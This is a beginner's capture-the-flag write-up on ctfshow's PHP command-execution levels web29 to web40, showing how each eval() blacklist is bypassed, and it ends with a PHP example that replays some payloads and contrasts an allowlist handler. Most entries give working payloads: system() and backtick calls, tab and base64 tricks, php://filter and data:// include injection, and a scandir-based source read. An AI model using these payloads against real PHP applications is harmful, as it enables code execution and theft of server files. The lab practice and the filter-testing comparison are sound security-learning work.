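ctfshow (Web Basics - Command Execution) - 1
1.web29
The code is executed only if the value of the c parameter does not contain "flag" (the /i modifier makes the match case-insensitive).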
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
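The payload only needs to avoid the string flag.
Try cat first (right-click and view the page source to see the output); tail and tac work as well.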
system("tail fla*");
tac reads the file in reverse line order.
tail reads the last 10 lines by default.
Use a file display function.
cp, and so on.
2.web30
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
flag, system and php must not appear.
echo`cat fl*g.p*hp`; replaces system (right-click and view the page source to see the output).
highlight_file(base64_decode("ZmxhZy5waHA="));
3.web31
The filter to bypass covers:
"flag", "system", "php", "cat", "sort", "shell", the period ("."), the space (" ") and the single quote ("'")
highlight_file(base64_decode("ZmxhZy5waHA="));
echo`tac%09fl*`; %09 (a tab) replaces the space.
Second method:
Use eval so that parameter 1 escapes the filter, since only c is checked.
4.web32
/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(
Compared with the previous challenge, echo, ( and ; are now filtered as well. Command injection no longer works, so try another method.
c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
5.web33
Compared with the previous challenge, the double quote is now filtered as well.
payload
c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
c=requirexx (require in place of include)
6.web34
Same as the previous challenge.
7.web35
Same payload as above.
c=include$_GET[1]%0a?>&1=php://filter/convert.base64-encode/resource=flag.php
8.web36
Compared with the previous level, digits are now restricted as well.
9.web37
There is an include, so try it first.
Then use data (the data:// wrapper) to execute code.
10.web38
The equals sign is filtered.
<?php system('ls');?> can be rewritten as <?=system("ls")?>
c=data://text/plain/,<?=system('tac fl*.*')?>
11.web39
Same payload as above.
c=data://text/plain/,<?=system('tac fl*.*')?>
12.web40
Official solution
show_source(next(array_reverse(scandir(pos(localeconv())))));
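The blacklists in web29 to web32 each let at least one of the inputs quoted above through to eval(). The following is an added example, not part of the original write-up: it replays three of those inputs against the page's regexes and contrasts the result with an allowlist handler. The action names in the handler are hypothetical, and the `$_GET[1]` form of the include input is an assumption.

```php
<?php
// Blacklists copied from the page (web29, web30, web32).
$blacklists = [
    'web29' => '/flag/i',
    'web30' => '/flag|system|php/i',
    'web32' => '/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i',
];

// Inputs quoted on the page, used here as regression cases for the filters.
$cases = [
    'system("tail fla*");',
    'highlight_file(base64_decode("ZmxhZy5waHA="));',
    'include$_GET[1]?>',
];

// Returns the names of the blacklists that would let $input reach eval().
function filters_passed(array $blacklists, string $input): array
{
    $passed = [];
    foreach ($blacklists as $name => $re) {
        if (!preg_match($re, $input)) {
            $passed[] = $name;
        }
    }
    return $passed;
}

// Hardened handler: the request only selects a key; no request data is ever
// evaluated as code or used as an include path. Action names are hypothetical.
function handle(string $c): string
{
    $actions = [
        'time'    => fn() => date('c'),
        'version' => fn() => 'app 1.0',
    ];
    if (!array_key_exists($c, $actions)) {
        return 'rejected';   // unknown input is refused, not sanitised
    }
    return $actions[$c]();
}

foreach ($cases as $input) {
    printf("%-48s passes: %s | allowlist: %s\n", $input,
        implode(',', filters_passed($blacklists, $input)) ?: 'none',
        handle($input));
}
```

Every row shows at least one blacklist letting the input through, while the allowlist handler rejects all three because none of them is a known key.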
I'm a beginner; if anything here falls short, feedback is very welcome!!!